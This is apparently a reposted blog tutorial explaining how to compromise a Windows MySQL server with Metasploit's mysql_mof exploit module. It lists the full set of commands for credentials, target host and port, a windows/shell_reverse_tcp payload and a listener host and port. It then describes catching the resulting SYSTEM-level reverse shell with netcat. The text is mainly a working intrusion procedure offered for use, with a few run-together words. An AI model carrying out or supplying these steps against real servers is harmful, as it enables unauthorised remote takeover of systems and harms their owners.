Shulou(Shulou.com)06/01 Report--

In view of the promotion of http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof in the previous article

Metasploit already has the code to use this method, and the principle is still the same to generate mof files, but bounce technology can be used in metasploit, so there is no need to add additional users, as long as the other server allows access to the public network.

Use exploit/windows/mysql/mysql_mofset password xxx / / set the password to login to mysql set username xxx / / set the user logging in to mysql set rhost xxx / / set the ip address to log in set rport xxxx / / set the port number of mysql set payload windows/shell_reverse_tcp / / the bounce module set lhost xxx / / bounce to the ip address set lport xxx / / bounce to the end After the port show options / / is set up Use this command to view the setting parameters exploit / / execution

If there is no problem, that is, exploit execution

Here, we use nc to listen to the corresponding port number, and then we can receive shell, usually with system permission, because the mof file is executed by system.

Please correct the mistakes.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.